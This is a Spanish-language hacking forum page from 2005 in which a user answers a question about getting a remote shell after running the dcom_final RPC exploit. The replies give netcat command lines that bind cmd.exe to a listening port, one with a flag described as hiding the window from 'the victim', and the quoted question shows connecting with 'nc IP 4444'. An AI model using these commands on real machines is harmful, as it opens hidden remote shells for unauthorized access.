elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8]
71  Seguridad Informática / Hacking / Re: Netcat y dcom_final ^^ en: 8 Julio 2005, 00:48 am
se me olvida puedes utilizar esto tambien:
Código:
-L -d -p puerto ip -t -e cmd.exe 
-L = escucha las conexiones en un puerto = que -l pero sigue escuchando en el puerto cuando la conexion es cerrada.
-d = encubre al programa en modo BackGround la victima no ve la ventanita jeje ;D
-t = es el negociador en una conexion telnet  8)
Citar
Bueno yo te voy a ayudar como la gente, si quieres te agregas a mi mail, te lo mando por un mensaje privado por si tienes mas dudas.
Para dejar al netcat a la escucha de un puerto tienes que hacer lo siguiente:
Inicio / Ejecutar / cmd
hay vaz a donde esta tu netcat (es mejor dejarlo en c:/windows/system32 para no tener que especificar donde esta tu nc.exe) supongamos que esta en c:/netcat
cd c:/netcat (esto en el simbolo de sistema)
y luego solo le das nc.exe
y cuando te dice "cmd line:" tu le escribes lo siguiente:
-vv -l -p (y el numero de el puerto sin los parentesis)
-l significa que deje un puerto abierto en espera de una conexion.
-p Le indicas el puerto donde esta.
Acá te dejo una foto que hice para que la veas.


Bueno espero que esto te sirva, cualquier cosa, te dejo mi mail por mensaje privado, si alguien mas necesita ayuda con el netcat que me avise.
esto funciona como un sniffer te recomiendo hacerlo en los puertos 25, 21, 23, 79
espero que te sirva si necesita ayuda ya sabes!  ;D y consulta tambien con el amigo SeniorX y por favor no caigas en el lado obscuro
Citar
como que no sabes utilizar el netcat jejejjejejje
saludos ;D
72  Seguridad Informática / Hacking / Re: Netcat y dcom_final ^^ en: 8 Julio 2005, 00:31 am
Citar
Bueno, esto casi que es una copia de otro post que puse en otro foro, así que espero que nadie se ofenda...ya que lo hago por que ahí parece que nadie tenga respuesta para esto :S

Bueno el caso es que estaba probando el exploit dcom_final...ese que usa el bug del RPC i una vez lanzo el exploit todo va bien. Me dice que use el netcat para conectarme al puerto 444 y abro otra linea de comandos escribo "nc IP 4444" (sin las comillas  ) y una vez hecho esto en teoria deberia darme shell remota al equipo víctima...pero en vez de eso...no pasa nada...simplemente me pasa otra vez a la siguiente linea sin haber consiguido shell :__(

No sé de que puede tratarse...si alguien supiera a que s edebe me haria feliz jajajaja ^^

para abrir un programa en este caso la shell (cmd.exe)
Código:
-vv -e cmd.exe -p pueto
checa en hack avanzado hay un post de shell con netcat
saludos  ;D
Páginas: 1 2 3 4 5 6 7 [8]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines